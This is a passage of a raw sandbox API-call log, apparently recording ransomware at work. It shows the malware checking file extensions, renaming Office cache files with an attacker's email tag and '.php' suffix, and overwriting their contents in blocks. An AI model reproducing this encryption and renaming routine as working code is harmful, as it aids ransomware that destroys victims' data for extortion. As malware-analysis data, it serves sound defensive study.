lstrlenW (lpString=".7z") returned 3 [0045.552] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.552] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.552] lstrlenW (lpString=".dbf") returned 4 [0045.552] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.552] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.552] lstrlenW (lpString=".1cd") returned 4 [0045.552] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.552] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.553] lstrlenW (lpString=".jpg") returned 4 [0045.553] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.553] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0045.553] lstrlenW (lpString="OneNoteMUI.msi") returned 14 [0045.553] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.553] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=2503680) returned 1 [0045.553] CloseHandle (hObject=0x198) returned 1 [0045.553] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi")) returned 0x2020 [0045.553] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0045.553] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0045.554] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.554] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0045.554] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.554] ReadFile (in: hFile=0x198, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.715] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.715] ReadFile (in: hFile=0x198, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.723] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.723] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.723] ReadFile (in: hFile=0x198, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.739] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.739] WriteFile (in: hFile=0x198, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0045.756] SetEndOfFile (hFile=0x198) returned 1 [0045.756] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0045.756] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.756] WriteFile (in: hFile=0x198, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.147] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.147] WriteFile (in: hFile=0x198, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.153] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.153] WriteFile (in: hFile=0x198, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.155] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0046.156] CloseHandle (hObject=0x198) returned 1 [0046.156] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0046.156] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.156] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.157] lstrlenW (lpString=".doc") returned 4 [0046.157] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.157] lstrlenW (lpString=".docx") returned 5 [0046.157] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0046.157] lstrlenW (lpString=".pdf") returned 4 [0046.157] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.157] lstrlenW (lpString=".xls") returned 4 [0046.157] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.157] lstrlenW (lpString=".xlsx") returned 5 [0046.157] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0046.157] lstrlenW (lpString=".ppt") returned 4 [0046.157] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.157] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.157] lstrlenW (lpString=".zip") returned 4 [0046.157] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.157] lstrlenW (lpString=".rar") returned 4 [0046.157] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.157] lstrlenW (lpString=".bz2") returned 4 [0046.157] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.157] lstrlenW (lpString=".7z") returned 3 [0046.157] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.157] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.157] lstrlenW (lpString=".dbf") returned 4 [0046.157] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.157] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.157] lstrlenW (lpString=".1cd") returned 4 [0046.157] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.157] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.157] lstrlenW (lpString=".jpg") returned 4 [0046.157] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.157] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.157] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.157] lstrlenW (lpString=".doc") returned 4 [0046.157] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.158] lstrlenW (lpString=".docx") returned 5 [0046.158] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0046.158] lstrlenW (lpString=".pdf") returned 4 [0046.158] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.158] lstrlenW (lpString=".xls") returned 4 [0046.158] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.158] lstrlenW (lpString=".xlsx") returned 5 [0046.158] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0046.158] lstrlenW (lpString=".ppt") returned 4 [0046.158] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.158] lstrlenW (lpString=".zip") returned 4 [0046.158] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.158] lstrlenW (lpString=".rar") returned 4 [0046.158] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.158] lstrlenW (lpString=".bz2") returned 4 [0046.158] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.158] lstrlenW (lpString=".7z") returned 3 [0046.158] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.158] lstrlenW (lpString=".dbf") returned 4 [0046.158] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.158] lstrlenW (lpString=".1cd") returned 4 [0046.158] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.158] lstrlenW (lpString=".jpg") returned 4 [0046.158] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.158] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0046.159] lstrlenW (lpString="GrooveMUI.msi") returned 13 [0046.159] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.159] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=2507776) returned 1 [0046.159] CloseHandle (hObject=0x198) returned 1 [0046.159] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi")) returned 0x2020 [0046.159] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.159] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0046.159] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.160] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0046.160] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.160] ReadFile (in: hFile=0x198, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.167] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.167] ReadFile (in: hFile=0x198, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.175] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0046.175] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.175] ReadFile (in: hFile=0x198, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.191] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.191] WriteFile (in: hFile=0x198, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0046.464] SetEndOfFile (hFile=0x198) returned 1 [0046.464] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x4a10048 [0046.543] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.543] WriteFile (in: hFile=0x198, lpBuffer=0x4a10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x4a10048*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.580] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.580] WriteFile (in: hFile=0x198, lpBuffer=0x4a10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x4a10048*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.586] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.586] WriteFile (in: hFile=0x198, lpBuffer=0x4a10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x4a10048*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.589] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a10048 | out: hHeap=0xb10000) returned 1 [0046.589] CloseHandle (hObject=0x198) returned 1 [0046.589] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0046.589] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0046.589] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0046.590] lstrlenW (lpString=".doc") returned 4 [0046.590] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.590] lstrlenW (lpString=".docx") returned 5 [0046.590] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0046.590] lstrlenW (lpString=".pdf") returned 4 [0046.590] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.590] lstrlenW (lpString=".xls") returned 4 [0046.590] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.590] lstrlenW (lpString=".xlsx") returned 5 [0046.590] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0046.590] lstrlenW (lpString=".ppt") returned 4 [0046.590] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0046.590] lstrlenW (lpString=".zip") returned 4 [0046.590] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.590] lstrlenW (lpString=".rar") returned 4 [0046.590] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.590] lstrlenW (lpString=".bz2") returned 4 [0046.590] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.590] lstrlenW (lpString=".7z") returned 3 [0046.590] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0046.590] lstrlenW (lpString=".dbf") returned 4 [0046.590] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0046.590] lstrlenW (lpString=".1cd") returned 4 [0046.590] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0046.590] lstrlenW (lpString=".jpg") returned 4 [0046.590] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0046.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0046.590] lstrlenW (lpString=".doc") returned 4 [0046.591] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.591] lstrlenW (lpString=".docx") returned 5 [0046.591] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0046.591] lstrlenW (lpString=".pdf") returned 4 [0046.591] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.591] lstrlenW (lpString=".xls") returned 4 [0046.591] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.591] lstrlenW (lpString=".xlsx") returned 5 [0046.591] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0046.591] lstrlenW (lpString=".ppt") returned 4 [0046.591] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0046.591] lstrlenW (lpString=".zip") returned 4 [0046.591] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.591] lstrlenW (lpString=".rar") returned 4 [0046.591] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.591] lstrlenW (lpString=".bz2") returned 4 [0046.591] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.591] lstrlenW (lpString=".7z") returned 3 [0046.591] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0046.591] lstrlenW (lpString=".dbf") returned 4 [0046.591] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0046.591] lstrlenW (lpString=".1cd") returned 4 [0046.591] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0046.591] lstrlenW (lpString=".jpg") returned 4 [0046.591] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.591] lstrcmpiW (lpString1=".manifest", lpString2=".php") returned -1 [0046.592] lstrlenW (lpString="Microsoft.VC90.CRT.manifest") returned 27 [0046.592] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.176] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=1857) returned 1 [0047.176] CloseHandle (hObject=0x1f8) returned 1 [0047.176] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 0x2020 [0047.176] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.177] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.177] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.177] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.177] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0047.177] GetLastError () returned 0x0 [0047.177] ReadFile (in: hFile=0x1f8, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x741, lpOverlapped=0x0) returned 1 [0047.183] WriteFile (in: hFile=0x200, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0x750, lpOverlapped=0x0) returned 1 [0047.184] ReadFile (in: hFile=0x1f8, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.184] WriteFile (in: hFile=0x200, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0x10a, lpOverlapped=0x0) returned 1 [0047.184] SetEndOfFile (hFile=0x200) returned 1 [0047.184] CloseHandle (hObject=0x200) returned 1 [0047.185] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.185] SetEndOfFile (hFile=0x1f8) returned 1 [0047.185] CloseHandle (hObject=0x1f8) returned 1 [0047.185] SetFileAttributesW 